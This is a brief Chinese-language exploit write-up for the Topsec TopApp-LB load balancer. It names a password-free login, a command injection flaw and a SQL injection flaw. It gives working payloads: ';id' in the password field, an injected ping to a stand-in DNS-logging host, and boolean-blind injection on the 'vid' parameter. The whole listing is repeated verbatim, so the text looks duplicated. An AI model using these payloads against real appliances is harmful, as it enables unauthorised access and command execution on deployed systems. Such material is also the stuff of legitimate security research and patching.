0x00 漏洞描述
1、天融信负载均衡TopApp-LB系统无需密码直接登陆
2、天融信TopApp-LB负载均衡命令执行漏洞
3、天融信TopApp-LB 负载均衡系统Sql注入漏洞
0x01 漏洞复现
1、使用poc::用户名随意 密码:;id
2、使用poc:; ping xxx.dnslog.info; echo
3.1、抓包
3.2、vid参数加单引号,报错
3.3、使用or 1=1 or 1=2发现返回界面不一样,证明存在注入点(布尔盲注)
1、天融信负载均衡TopApp-LB系统无需密码直接登陆
2、天融信TopApp-LB负载均衡命令执行漏洞
3、天融信TopApp-LB 负载均衡系统Sql注入漏洞
1、使用poc::用户名随意 密码:;id
2、使用poc:; ping xxx.dnslog.info; echo
3.1、抓包
3.2、vid参数加单引号,报错
3.3、使用or 1=1 or 1=2发现返回界面不一样,证明存在注入点(布尔盲注)